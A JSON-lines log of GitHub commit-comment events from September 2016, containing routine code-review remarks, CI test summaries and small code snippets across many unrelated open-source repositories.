{"id":"4594179773","type":"CommitCommentEvent","actor":{"login":"Pumpuli"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19108436,"position":141,"line":1613,"path":"src/ng/directive/input.js","commit_id":"9a8b8aaa9641bfc85d245c4355fa5481285b593f","created_at":"2016-09-21T05:44:02Z","updated_at":"2016-09-21T05:44:02Z","body":"Browsers start counting the step from the `min` attribute:\r\n\r\n```html\r\n<input type=\"number\" min=\"5\" max=\"105\" step=\"10\">\r\n```\r\n\r\nValid values for this input would be 5, 15, 25, ...\r\n\r\nThe validation has to check if `min` attribute exists and use that in the step validation. Either `(viewValue % stepVal) === (minVal % stepVal)` or `(viewValue - minVal) % stepVal === 0`, but I guess the latter is clearer."}},"created_at":"2016-09-21T05:44:02Z"}
{"id":"4594185586","type":"CommitCommentEvent","actor":{"login":"jhhghaha"},"repo":{"name":"jhhghaha/homework0"},"payload":{"comment":{"id":19108448,"position":null,"line":null,"path":null,"commit_id":"9f8ebc781901e46b895687125de50db3ee64cfb0","created_at":"2016-09-21T05:46:20Z","updated_at":"2016-09-21T05:46:20Z","body":"痾斯"}},"created_at":"2016-09-21T05:46:20Z"}
{"id":"4594188555","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108452,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T05:47:31Z","updated_at":"2016-09-21T05:47:31Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-MacOS-10.9-clang: OK (2330 of 2333 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T05:47:31Z"}
{"id":"4594191387","type":"CommitCommentEvent","actor":{"login":"JFreegman"},"repo":{"name":"JFreegman/toxic"},"payload":{"comment":{"id":19108456,"position":null,"line":null,"path":null,"commit_id":"221d761ff49f3e6fb3e9ae0a0be49366054d7339","created_at":"2016-09-21T05:48:39Z","updated_at":"2016-09-21T05:48:39Z","body":"They'll have to use the /connect command. Toxic will support IPv6 entries soon enough though."}},"created_at":"2016-09-21T05:48:39Z"}
{"id":"4594191636","type":"CommitCommentEvent","actor":{"login":"Mazyod"},"repo":{"name":"SwiftKitz/Appz"},"payload":{"comment":{"id":19108457,"position":null,"line":null,"path":null,"commit_id":"fa2df5dbb92914c18b522cb1ce7c991d7fb871a7","created_at":"2016-09-21T05:48:45Z","updated_at":"2016-09-21T05:48:45Z","body":"Don't worry about it. This is just how working in a team is like, everyone helps where ever they can."}},"created_at":"2016-09-21T05:48:45Z"}
{"id":"4594192893","type":"CommitCommentEvent","actor":{"login":"edsan"},"repo":{"name":"edsan/hello-world2"},"payload":{"comment":{"id":19108462,"position":null,"line":null,"path":null,"commit_id":"4f119b419be81bea080d64a0e12047a2f3ecd51e","created_at":"2016-09-21T05:49:16Z","updated_at":"2016-09-21T05:49:16Z","body":"added oh captain"}},"created_at":"2016-09-21T05:49:16Z"}
{"id":"4594193352","type":"CommitCommentEvent","actor":{"login":"jf3096"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19108464,"position":null,"line":null,"path":null,"commit_id":"127d981ca6b9caeffdb476709f9897a7e17af30e","created_at":"2016-09-21T05:49:25Z","updated_at":"2016-09-21T05:49:25Z","body":"在107行 当初是有300ms timeout延迟的 我以为你的目的在于用户狂点提交按钮的时候  会validate  同时能闪烁感叹号(因为有300ms延迟的设定) 现在去除了 是为什么？"}},"created_at":"2016-09-21T05:49:25Z"}
{"id":"4594193793","type":"CommitCommentEvent","actor":{"login":"sebix"},"repo":{"name":"rthalley/dnspython"},"payload":{"comment":{"id":19108466,"position":null,"line":null,"path":null,"commit_id":"fdedb362291240b9a3587071c4151e003a730486","created_at":"2016-09-21T05:49:36Z","updated_at":"2016-09-21T05:49:36Z","body":"A failure is allowed explicitly for this version, so the build succeeds even if this job fails. But this allows us to see possible issues in future versions an fix them before they \"appear\"."}},"created_at":"2016-09-21T05:49:36Z"}
{"id":"4594193836","type":"CommitCommentEvent","actor":{"login":"MehdyKarimpour"},"repo":{"name":"signumsoftware/framework"},"payload":{"comment":{"id":19108467,"position":null,"line":null,"path":null,"commit_id":"6bb182f1d998e7b246011caf84c5c820f0e0ab9d","created_at":"2016-09-21T05:49:37Z","updated_at":"2016-09-21T05:49:37Z","body":"I strongly recommend that everybody moves to React."}},"created_at":"2016-09-21T05:49:37Z"}
{"id":"4594196311","type":"CommitCommentEvent","actor":{"login":"2m"},"repo":{"name":"liucijus/liucijus.github.io"},"payload":{"comment":{"id":19108478,"position":11,"line":11,"path":"_posts/2016-09-20-you-may-not-need-builder-ever.markdown","commit_id":"09cc69c6e7ef9ad2be60394733c0571d9c0ef5e2","created_at":"2016-09-21T05:50:33Z","updated_at":"2016-09-21T05:50:33Z","body":"I do not think you need builder pattern to give names to methods. :)\r\n\r\nI think here you meant _... giving names to arguments ..._"}},"created_at":"2016-09-21T05:50:33Z"}
{"id":"4594198173","type":"CommitCommentEvent","actor":{"login":"2m"},"repo":{"name":"liucijus/liucijus.github.io"},"payload":{"comment":{"id":19108482,"position":32,"line":32,"path":"_posts/2016-09-20-you-may-not-need-builder-ever.markdown","commit_id":"09cc69c6e7ef9ad2be60394733c0571d9c0ef5e2","created_at":"2016-09-21T05:51:18Z","updated_at":"2016-09-21T05:51:18Z","body":"Copy pasta here. s/Foo/val/"}},"created_at":"2016-09-21T05:51:18Z"}
{"id":"4594198881","type":"CommitCommentEvent","actor":{"login":"2m"},"repo":{"name":"liucijus/liucijus.github.io"},"payload":{"comment":{"id":19108486,"position":41,"line":41,"path":"_posts/2016-09-20-you-may-not-need-builder-ever.markdown","commit_id":"09cc69c6e7ef9ad2be60394733c0571d9c0ef5e2","created_at":"2016-09-21T05:51:35Z","updated_at":"2016-09-21T05:51:35Z","body":"Same as above. s/Foo/val/"}},"created_at":"2016-09-21T05:51:35Z"}
{"id":"4594202369","type":"CommitCommentEvent","actor":{"login":"zaibon"},"repo":{"name":"Jumpscale/jumpscale_core8"},"payload":{"comment":{"id":19108493,"position":null,"line":null,"path":null,"commit_id":"7dd92a5b304e700ecd231cf382dbf4b4e8f3f61f","created_at":"2016-09-21T05:52:59Z","updated_at":"2016-09-21T05:52:59Z","body":"If we are not going to use the concept of one branch per story we need to update our [Agile book](https://gig.gitbooks.io/agile/content/CodingCycle.html)"}},"created_at":"2016-09-21T05:52:59Z"}
{"id":"4594203446","type":"CommitCommentEvent","actor":{"login":"weizh888"},"repo":{"name":"eugenio412/PogomBOT"},"payload":{"comment":{"id":19108495,"position":null,"line":null,"path":null,"commit_id":"e1983a4d2e8d95334bd0a2a4fe01659d40b4b3d0","created_at":"2016-09-21T05:53:26Z","updated_at":"2016-09-21T05:53:26Z","body":"The code runs great on my computer. It uses a same min IV for all Pokémon in the list. Is that possible to specify different min IV values for different Pokémons? This comes from the fact that, for some pokemons, they are so common that a high threshold is desired; while a low threshold is necessary for rare pokemons. I've modified the code to realize the purpose, but I want to it to be more flexible to allow inputting a threshold IV for a specific Pokémon through some command to update the preset general min IV. Would you mind to add this feature?"}},"created_at":"2016-09-21T05:53:26Z"}
{"id":"4594203913","type":"CommitCommentEvent","actor":{"login":"GarenWang"},"repo":{"name":"GarenWang/boyasi"},"payload":{"comment":{"id":19108496,"position":12,"line":12,"path":"grep -f的用法","commit_id":"6cd5d17022eca8103b2de9be77f40a2ee24b998a","created_at":"2016-09-21T05:53:36Z","updated_at":"2016-09-21T05:53:36Z","body":"****"}},"created_at":"2016-09-21T05:53:36Z"}
{"id":"4594204534","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"genouest/biomaj"},"payload":{"comment":{"id":19108497,"position":31,"line":31,"path":"biomaj/download/rsync.py","commit_id":"0a5859c4691d658d501f8f5f815beeab473ce02f","created_at":"2016-09-21T05:53:50Z","updated_at":"2016-09-21T05:53:50Z","body":"if hostname:"}},"created_at":"2016-09-21T05:53:50Z"}
{"id":"4594205886","type":"CommitCommentEvent","actor":{"login":"acelyc111"},"repo":{"name":"miloyip/rapidjson"},"payload":{"comment":{"id":19108500,"position":20,"line":213,"path":"test/unittest/prettywritertest.cpp","commit_id":"185a7cc21026550cda61d01cca6004b63a26963b","created_at":"2016-09-21T05:54:22Z","updated_at":"2016-09-21T05:54:22Z","body":"gcc 4.4.7 is not support this syntax, maybe macro RAPIDJSON_HAS_CXX11_RVALUE_REFS should modify"}},"created_at":"2016-09-21T05:54:22Z"}
{"id":"4594206536","type":"CommitCommentEvent","actor":{"login":"edsan"},"repo":{"name":"edsan/hello-world2"},"payload":{"comment":{"id":19108503,"position":null,"line":null,"path":null,"commit_id":"219451145218c18f2bf009419e0c80ead1954c06","created_at":"2016-09-21T05:54:36Z","updated_at":"2016-09-21T05:54:36Z","body":"no comment"}},"created_at":"2016-09-21T05:54:36Z"}
{"id":"4594208378","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"genouest/biomaj"},"payload":{"comment":{"id":19108508,"position":22,"line":22,"path":"biomaj/download/rsync.py","commit_id":"0a5859c4691d658d501f8f5f815beeab473ce02f","created_at":"2016-09-21T05:55:20Z","updated_at":"2016-09-21T05:55:20Z","body":"dos not respect interface for constructor. Keep protocol, server, remote.dir  (hostdir = remote.dir).\r\nUsername can be used with credentials parameter (automatically added if present in bank config)"}},"created_at":"2016-09-21T05:55:20Z"}
{"id":"4594210091","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"genouest/biomaj"},"payload":{"comment":{"id":19108511,"position":43,"line":43,"path":"biomaj/download/rsync.py","commit_id":"0a5859c4691d658d501f8f5f815beeab473ce02f","created_at":"2016-09-21T05:56:00Z","updated_at":"2016-09-21T05:56:00Z","body":"if self.hostdir and sel.username"}},"created_at":"2016-09-21T05:56:00Z"}
{"id":"4594211637","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"genouest/biomaj"},"payload":{"comment":{"id":19108516,"position":54,"line":54,"path":"biomaj/download/rsync.py","commit_id":"0a5859c4691d658d501f8f5f815beeab473ce02f","created_at":"2016-09-21T05:56:33Z","updated_at":"2016-09-21T05:56:33Z","body":"use logging not print and exit with error"}},"created_at":"2016-09-21T05:56:33Z"}
{"id":"4594211709","type":"CommitCommentEvent","actor":{"login":"thirstyice"},"repo":{"name":"thirstyice/thirstyOS"},"payload":{"comment":{"id":19108517,"position":null,"line":null,"path":null,"commit_id":"84c08dca3635a3fff821548d19fd82ea65cb4e69","created_at":"2016-09-21T05:56:34Z","updated_at":"2016-09-21T05:56:34Z","body":"Probably will at least help with #8 "}},"created_at":"2016-09-21T05:56:34Z"}
{"id":"4594213841","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"genouest/biomaj"},"payload":{"comment":{"id":19108521,"position":70,"line":70,"path":"biomaj/download/rsync.py","commit_id":"0a5859c4691d658d501f8f5f815beeab473ce02f","created_at":"2016-09-21T05:57:23Z","updated_at":"2016-09-21T05:57:23Z","body":"for performance, split parts[2] first in a variable then use this new array, instead of splitting X times the same thing"}},"created_at":"2016-09-21T05:57:23Z"}
{"id":"4594216594","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19108529,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T05:58:26Z","updated_at":"2016-09-21T05:58:26Z","body":"It's the only thing I see that could break the boot, everything else is the same as MM.. What's the recovery output? Loki patches the boot image (or at least tries to patch)? "}},"created_at":"2016-09-21T05:58:26Z"}
{"id":"4594216925","type":"CommitCommentEvent","actor":{"login":"ariyuan"},"repo":{"name":"reportunit/reportunit"},"payload":{"comment":{"id":19108530,"position":null,"line":null,"path":null,"commit_id":"89d14439949e74884532b5c16701c0747f4039c2","created_at":"2016-09-21T05:58:32Z","updated_at":"2016-09-21T05:58:32Z","body":"so here the code \"$\"\\n\\nOutput:\\n\"\" is a new feature in c# 6.0? I can not get it compiled with my vs 2013...."}},"created_at":"2016-09-21T05:58:32Z"}
{"id":"4594220468","type":"CommitCommentEvent","actor":{"login":"liucijus"},"repo":{"name":"liucijus/liucijus.github.io"},"payload":{"comment":{"id":19108540,"position":11,"line":11,"path":"_posts/2016-09-20-you-may-not-need-builder-ever.markdown","commit_id":"09cc69c6e7ef9ad2be60394733c0571d9c0ef5e2","created_at":"2016-09-21T05:59:56Z","updated_at":"2016-09-21T05:59:56Z","body":"I meant methods here - in Java I cannot have named parameters. Builder pattern adds **methods with explicit name** for each parameter we want to add.\r\n\r\nAnyway, sentence is very messy to get it right, I need to work more on clarity.\r\nThanks for the feedback!"}},"created_at":"2016-09-21T05:59:56Z"}
{"id":"4594222091","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19108560,"position":9,"line":9,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-21T06:00:24Z","updated_at":"2016-09-21T06:00:24Z","body":"+1. I might want to share this project with other users."}},"created_at":"2016-09-21T06:00:24Z"}
{"id":"4594225888","type":"CommitCommentEvent","actor":{"login":"cdaringe"},"repo":{"name":"MRN-Code/coinstac"},"payload":{"comment":{"id":19108584,"position":null,"line":null,"path":null,"commit_id":"5313f562f33dc83290a7d3210efb8be5e597ce54","created_at":"2016-09-21T06:01:48Z","updated_at":"2016-09-21T06:01:48Z","body":"It was a joke\n\nOn Sep 20, 2016 10:25 PM, \"Cory Reed\" <notifications@github.com> wrote:\n\n> Yeah…my reasoning is that the long stack traces don’t make sense to\n> algorithm authors. They need simple, human-readable errors based on my\n> limited experience.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MRN-Code/coinstac/commit/5313f562f33dc83290a7d3210efb8be5e597ce54#commitcomment-19108320>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA9O_fb0CETaewISu5_f03FC9uIIWmD3ks5qsL_EgaJpZM4KCSSK>\n> .\n>\n"}},"created_at":"2016-09-21T06:01:48Z"}
{"id":"4594228236","type":"CommitCommentEvent","actor":{"login":"AkeluX"},"repo":{"name":"ESAFastPrototyping/WebWorldWind"},"payload":{"comment":{"id":19108592,"position":null,"line":null,"path":null,"commit_id":"240b513b08215e224639ab5fd9b0594d50005ca0","created_at":"2016-09-21T06:02:41Z","updated_at":"2016-09-21T06:02:41Z","body":"This is in response to issue NASAWorldWind/WebWorldWind#51"}},"created_at":"2016-09-21T06:02:41Z"}
{"id":"4594229702","type":"CommitCommentEvent","actor":{"login":"MrRoboman4321"},"repo":{"name":"Skunkworks1983/Loading-Bar-Package"},"payload":{"comment":{"id":19108594,"position":11,"line":11,"path":"README.md","commit_id":"49d4dfac1088ecf36ecfb7942ca9a15cc928c3b9","created_at":"2016-09-21T06:03:15Z","updated_at":"2016-09-21T06:03:15Z","body":"You should be able to, but you may need to http://downloadmoreram.com/ for the operating system to work correctly with the router's wifi."}},"created_at":"2016-09-21T06:03:15Z"}
{"id":"4594230766","type":"CommitCommentEvent","actor":{"login":"liucijus"},"repo":{"name":"liucijus/liucijus.github.io"},"payload":{"comment":{"id":19108600,"position":32,"line":32,"path":"_posts/2016-09-20-you-may-not-need-builder-ever.markdown","commit_id":"09cc69c6e7ef9ad2be60394733c0571d9c0ef5e2","created_at":"2016-09-21T06:03:39Z","updated_at":"2016-09-21T06:03:39Z","body":"Thanks a lot!"}},"created_at":"2016-09-21T06:03:39Z"}
{"id":"4594233585","type":"CommitCommentEvent","actor":{"login":"TsunoMamoru"},"repo":{"name":"TsunoMamoru/TestPull"},"payload":{"comment":{"id":19108611,"position":null,"line":null,"path":null,"commit_id":"27ceee41a332bb2459fca9d9ba44217fc5ec3726","created_at":"2016-09-21T06:04:47Z","updated_at":"2016-09-21T06:04:47Z","body":"test"}},"created_at":"2016-09-21T06:04:47Z"}
{"id":"4594233638","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"cloudflare/CloudFlare-Wordpress"},"payload":{"comment":{"id":19108612,"position":null,"line":null,"path":null,"commit_id":"066be68f9e6e534526ed35f37924f697bb252eaa","created_at":"2016-09-21T06:04:48Z","updated_at":"2016-09-21T06:04:48Z","body":"I wonder, which one do you prefer? I assume it's 4 spaces. If so I could make a PR to normalize the whitespace in all files except for vendor/."}},"created_at":"2016-09-21T06:04:48Z"}
{"id":"4594236946","type":"CommitCommentEvent","actor":{"login":"kkwikk1"},"repo":{"name":"kkwikk1/hello-world"},"payload":{"comment":{"id":19108616,"position":null,"line":null,"path":null,"commit_id":"0dc0a898426a8a5b5210316e9405d5c8153f34e3","created_at":"2016-09-21T06:06:00Z","updated_at":"2016-09-21T06:06:00Z","body":"new test"}},"created_at":"2016-09-21T06:06:00Z"}
{"id":"4594237600","type":"CommitCommentEvent","actor":{"login":"idlethread"},"repo":{"name":"ldts/zephyr"},"payload":{"comment":{"id":19108617,"position":4,"line":4,"path":"samples/drivers/soc_flash_stm32f4/testcase.ini","commit_id":"282065b741f41222bafc76c678ed2a07658e484e","created_at":"2016-09-21T06:06:14Z","updated_at":"2016-09-21T06:06:14Z","body":"Update to STM platforms"}},"created_at":"2016-09-21T06:06:14Z"}
{"id":"4594238636","type":"CommitCommentEvent","actor":{"login":"idlethread"},"repo":{"name":"ldts/zephyr"},"payload":{"comment":{"id":19108620,"position":2,"line":2,"path":"samples/drivers/soc_flash_stm32f4/Makefile","commit_id":"282065b741f41222bafc76c678ed2a07658e484e","created_at":"2016-09-21T06:06:37Z","updated_at":"2016-09-21T06:06:37Z","body":"Update to STM platforms"}},"created_at":"2016-09-21T06:06:37Z"}
{"id":"4594239196","type":"CommitCommentEvent","actor":{"login":"2m"},"repo":{"name":"liucijus/liucijus.github.io"},"payload":{"comment":{"id":19108621,"position":11,"line":11,"path":"_posts/2016-09-20-you-may-not-need-builder-ever.markdown","commit_id":"09cc69c6e7ef9ad2be60394733c0571d9c0ef5e2","created_at":"2016-09-21T06:06:49Z","updated_at":"2016-09-21T06:06:49Z","body":"I see. Yea, my suggestion does not make sense either, when I look at it the second time."}},"created_at":"2016-09-21T06:06:49Z"}
{"id":"4594242525","type":"CommitCommentEvent","actor":{"login":"Jeremylinkk"},"repo":{"name":"DosoIT/msu-pt"},"payload":{"comment":{"id":19108638,"position":null,"line":null,"path":null,"commit_id":"35ecec4eab710a65c3f404ae7a546282e12d4b71","created_at":"2016-09-21T06:07:38Z","updated_at":"2016-09-21T06:07:38Z","body":"GG"}},"created_at":"2016-09-21T06:07:38Z"}
{"id":"4594243496","type":"CommitCommentEvent","actor":{"login":"idlethread"},"repo":{"name":"ldts/zephyr"},"payload":{"comment":{"id":19108640,"position":11,"line":11,"path":"drivers/flash/soc_flash_stm32f4.c","commit_id":"282065b741f41222bafc76c678ed2a07658e484e","created_at":"2016-09-21T06:08:00Z","updated_at":"2016-09-21T06:08:00Z","body":"This is frowned upon now. Just use printk and if needed use the SYS_LOG macros."}},"created_at":"2016-09-21T06:08:00Z"}
{"id":"4594244136","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19108641,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T06:08:12Z","updated_at":"2016-09-21T06:08:12Z","body":"#4538 merged."}},"created_at":"2016-09-21T06:08:12Z"}
{"id":"4594244759","type":"CommitCommentEvent","actor":{"login":"quizywiz"},"repo":{"name":"rexyl/slather"},"payload":{"comment":{"id":19108642,"position":11,"line":90,"path":"slather/sim/Cell.java","commit_id":"e10d183729f3717b1802e6234241766dbc16beec","created_at":"2016-09-21T06:08:26Z","updated_at":"2016-09-21T06:08:26Z","body":"This needs to be reverted lol, makes the pherome placement so unpredictable :/"}},"created_at":"2016-09-21T06:08:26Z"}
{"id":"4594246222","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108647,"position":1364,"line":1364,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:08:57Z","updated_at":"2016-09-21T06:08:57Z","body":"口頭で質問させて頂きました内容です。\r\n`get_neighbor`、`get_neighbors`や`get_network`、`get_networks`\r\nを別メソッドではなく、同一メソッドで切り替えることはできないでしょうか？\r\n`self.simple_switch.get_neighbors`、`self.simple_switch.get_networks`の引数ありなしの違いであるため、可能だと思いますが。"}},"created_at":"2016-09-21T06:08:57Z"}
{"id":"4594247149","type":"CommitCommentEvent","actor":{"login":"TsunoMamoru"},"repo":{"name":"TsunoMamoru/TestPull"},"payload":{"comment":{"id":19108650,"position":null,"line":null,"path":null,"commit_id":"27ceee41a332bb2459fca9d9ba44217fc5ec3726","created_at":"2016-09-21T06:09:18Z","updated_at":"2016-09-21T06:09:18Z","body":"test #"}},"created_at":"2016-09-21T06:09:18Z"}
{"id":"4594253696","type":"CommitCommentEvent","actor":{"login":"angusguo"},"repo":{"name":"angusguo/projects-blog"},"payload":{"comment":{"id":19108664,"position":null,"line":null,"path":null,"commit_id":"9a89b093de0d7275c2fbd10bf96db9e0c506efee","created_at":"2016-09-21T06:11:38Z","updated_at":"2016-09-21T06:11:38Z","body":"# 这是我的第一个练手项目！"}},"created_at":"2016-09-21T06:11:38Z"}
{"id":"4594256433","type":"CommitCommentEvent","actor":{"login":"popshan"},"repo":{"name":"popshan/test-"},"payload":{"comment":{"id":19108668,"position":3,"line":2,"path":"README.md","commit_id":"9053260cf06c599e633bc41179e8f77f33fe9c5d","created_at":"2016-09-21T06:12:31Z","updated_at":"2016-09-21T06:12:31Z","body":"edited in the Git Hyubn"}},"created_at":"2016-09-21T06:12:31Z"}
{"id":"4594257852","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"FGMEMBERS-SCENERY/EGPH-fg-CustomScenery"},"payload":{"comment":{"id":19108671,"position":null,"line":null,"path":null,"commit_id":"b809e69fad629a910463b5e15a4324383f2f6d43","created_at":"2016-09-21T06:13:01Z","updated_at":"2016-09-21T06:13:01Z","body":"http://s14.postimg.org/xbqmpdre9/fgfs_screen_193.png"}},"created_at":"2016-09-21T06:13:01Z"}
{"id":"4594258608","type":"CommitCommentEvent","actor":{"login":"luccioman"},"repo":{"name":"yacy/yacy_webclient_bootstrap"},"payload":{"comment":{"id":19108672,"position":null,"line":null,"path":null,"commit_id":"ffc3625e7c4e557eb898785306cef5eb8da3b27b","created_at":"2016-09-21T06:13:16Z","updated_at":"2016-09-21T06:13:16Z","body":"Hi @Orbiter , what would be your opinion about also progressively switching the main YaCy web interface from XHTML 1.1 to HTML5?"}},"created_at":"2016-09-21T06:13:16Z"}
{"id":"4594260453","type":"CommitCommentEvent","actor":{"login":"martbhell"},"repo":{"name":"CSC-IT-Center-for-Science/ansible-role-arc-frontend"},"payload":{"comment":{"id":19108678,"position":4,"line":132,"path":"defaults/main.yml","commit_id":"202a5558eb8088be15eaa83201be1116b5ed6ddc","created_at":"2016-09-21T06:13:52Z","updated_at":"2016-09-21T06:13:52Z","body":"At least one site (Aalto) already have fair sharing created - this will change their existing configuration."}},"created_at":"2016-09-21T06:13:52Z"}
{"id":"4594262079","type":"CommitCommentEvent","actor":{"login":"a5c3nd3d"},"repo":{"name":"a5c3nd3d/SWE20001-Battleships"},"payload":{"comment":{"id":19108680,"position":null,"line":null,"path":null,"commit_id":"e268b4c3cf68c7dd629e898fa0625748ae8c2440","created_at":"2016-09-21T06:14:31Z","updated_at":"2016-09-21T06:14:31Z","body":"Closes #1, #2"}},"created_at":"2016-09-21T06:14:31Z"}
{"id":"4594262133","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19108681,"position":8,"line":3065,"path":"main/install/install.lib.php","commit_id":"0fd95c5b2f5ec6808ebf3367336dd7cf089c75f9","created_at":"2016-09-21T06:14:32Z","updated_at":"2016-09-21T06:14:32Z","body":"Merci :smile_cat: "}},"created_at":"2016-09-21T06:14:32Z"}
{"id":"4594264239","type":"CommitCommentEvent","actor":{"login":"miekg"},"repo":{"name":"mholt/caddy"},"payload":{"comment":{"id":19108684,"position":null,"line":null,"path":null,"commit_id":"fcad4740649c391e2f3b99d7798716dfa8424068","created_at":"2016-09-21T06:15:17Z","updated_at":"2016-09-21T06:15:17Z","body":"lgtm"}},"created_at":"2016-09-21T06:15:17Z"}
{"id":"4594264703","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108689,"position":1447,"line":1447,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:15:27Z","updated_at":"2016-09-21T06:15:27Z","body":"ポート番号の例も一緒に記載しているため、`(e.g. \"s1-eth1\", 1)`\r\nになっているのだと思いますが、例が2つであるため、\r\n`(e.g. \"s1-eth1\" or 1)`のほうがよいのではないでしょうか？\r\n３つ以上であれば(A, B or C)になるためカンマを使用することになると思いますが。"}},"created_at":"2016-09-21T06:15:27Z"}
{"id":"4594265249","type":"CommitCommentEvent","actor":{"login":"md5"},"repo":{"name":"SuperTux88/rubymetrics-plugin"},"payload":{"comment":{"id":19108694,"position":null,"line":null,"path":null,"commit_id":"61f5f2ad69c284e89e7d04660fb6365ddc780eb3","created_at":"2016-09-21T06:15:38Z","updated_at":"2016-09-21T06:15:38Z","body":"I added `@DataBoundSetter` to `setTargets()` in https://github.com/md5/rubymetrics-plugin/commit/1a6a519a959cd499ba8d01427201d67ba8d37ebb and was able to make target configuration work.\r\n\r\nMy updated step configuration looked like this:\r\n\r\n```groovy\r\nstep([\r\n    $class: 'hudson.plugins.rubyMetrics.rcov.RcovPublisher',\r\n    reportDir: \"coverage/rcov\",\r\n    targets: [\r\n        [metric: \"CODE_COVERAGE\", healthy: 99, unhealthy: 99, unstable: 99]\r\n    ]\r\n])\r\n```"}},"created_at":"2016-09-21T06:15:38Z"}
{"id":"4594266663","type":"CommitCommentEvent","actor":{"login":"popshan"},"repo":{"name":"popshan/test-"},"payload":{"comment":{"id":19108696,"position":null,"line":null,"path":null,"commit_id":"9053260cf06c599e633bc41179e8f77f33fe9c5d","created_at":"2016-09-21T06:16:07Z","updated_at":"2016-09-21T06:16:07Z","body":"rg"}},"created_at":"2016-09-21T06:16:07Z"}
{"id":"4594268490","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108699,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-21T06:16:46Z","updated_at":"2016-09-21T06:16:46Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2373 tests passed, 0 test warnings)\n\n * 5 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 3 tests had: AUD diffs.\n * 4 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 4 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T06:16:46Z"}
{"id":"4594271807","type":"CommitCommentEvent","actor":{"login":"rafuck"},"repo":{"name":"rafuck/DbSimple"},"payload":{"comment":{"id":19108704,"position":null,"line":null,"path":null,"commit_id":"777213633a98139931e401cc7d86da234acb41d2","created_at":"2016-09-21T06:17:55Z","updated_at":"2016-09-21T06:17:55Z","body":"$DB->select('SELECT * FROM `test` ORDER BY ?o', array('test' => array('name' => 'desc', 'id')));\r\n$DB->select('SELECT * FROM `test` ORDER BY ?o', array('name' => 'desc', 'id'));\r\n$DB->select('SELECT * FROM `test` ORDER BY ?o', 'name');\r\n-----------------------------------------------------\r\nSELECT * FROM `test` ORDER BY `test`.`name` DESC, `test`.`id` ASC\r\nSELECT * FROM `test` ORDER BY `name` DESC, `id` ASC\r\nSELECT * FROM `test` ORDER BY `name` ASC"}},"created_at":"2016-09-21T06:17:55Z"}
